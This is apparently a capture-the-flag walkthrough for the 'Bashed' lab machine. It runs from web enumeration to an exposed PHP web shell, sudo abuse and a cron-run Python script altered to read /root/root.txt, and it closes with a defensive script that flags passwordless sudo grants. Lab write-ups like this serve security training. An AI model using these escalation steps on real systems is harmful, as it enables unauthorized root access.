- Do some simple HTTP enumeration to find a custom PHP script
- Use the phpbash.php script to grab the user and root flags
First I start with an nmap scan:

```
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-16 15:48 EDT
Nmap scan report for 10.10.10.68
Host is up (0.053s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.28 seconds
```
Only one port this time. Navigating to the webpage I see a nice custom site. A quick look around doesn't reveal anything obvious.

Running gobuster reveals some directories:

```
/images (Status: 301)
/uploads (Status: 301)
/php (Status: 301)
/css (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/config.php (Status: 200)
/fonts (Status: 301)
```
Quite a few options, but the one that is interesting to us is the /dev directory. Navigating to it I see two files: phpbash.min.php and phpbash.php.

It doesn't matter which file you choose; both of them give you a bash-like shell written in PHP.
At this point you can grab the user flag located in /user/arrexel.
Now time to get the root flag. Running a quick sudo -l I see that I can run sudo as the user scriptmanager:

```
www-data@bashed:/var/www/html/dev# sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
```
Doing some basic enumeration around the box I noticed a strange directory named /scripts, which is not there by default. A quick permissions check reveals that the directory is owned by the user scriptmanager. As the user www-data I can see there are two files in there, but I am unable to read them. This is where I will use scriptmanager's sudo privileges:

```
www-data@bashed:/# sudo -u scriptmanager cat /scripts/test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
www-data@bashed:/# sudo -u scriptmanager cat /scripts/test.txt
testing 123!
```
Looking at both files I conclude that there is probably a scheduled process executing test.py and sending its output to test.txt.

What I am going to do is edit the test.py script to copy the contents of the root.txt file into test.txt so I can then read it. This can be achieved with the short script below:

```python
# Copy the first line of /root/root.txt into test.txt when the scheduled job runs.
f = open("test.txt", "w")
r = open("/root/root.txt", "r")
re = r.readline()
f.write(re)
f.close()  # close so the buffered write is flushed to disk
r.close()
```
Now I wait for the script to run again. If you did everything correctly, you should be able to get the root flag by reading the /scripts/test.txt file.
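From the defender's side, the weak link on this box is the sudoers rule that lets a service account run ALL commands as another user with no password. Below is an added example (not part of the original writeup) that parses `sudo -l` output in the same format shown above and flags such grants; the sample text is constructed to mirror the box's output plus one harmless extra rule.

```python
"""Audit `sudo -l` output for NOPASSWD grants of ALL commands (added example)."""
import re

# Constructed sample, modelled on the `sudo -l` output shown in the writeup,
# with an extra narrow rule added so the filter has something to ignore.
SAMPLE = """Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
    (root) /usr/bin/systemctl restart apache2
"""

# A rule line looks like: (runas_user[ : runas_group]) [TAG: ...] command
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_rules(text):
    """Return a list of (runas_user, [tags], command) from `sudo -l` output."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        # Rules start after the "User X may run the following commands" header.
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        rules.append((runas, tags, m.group("cmd").strip()))
    return rules


def risky_rules(rules):
    """Flag rules that allow ALL commands without a password as any user."""
    return [r for r in rules if r[2] == "ALL" and "NOPASSWD" in r[1]]


if __name__ == "__main__":
    for runas, tags, cmd in risky_rules(parse_sudo_rules(SAMPLE)):
        print(f"RISK: passwordless ALL as '{runas}' (tags={tags}, cmd={cmd})")
```

Run it against real `sudo -l` output captured during a host review; a passwordless ALL grant to a web or script account is the finding to remediate.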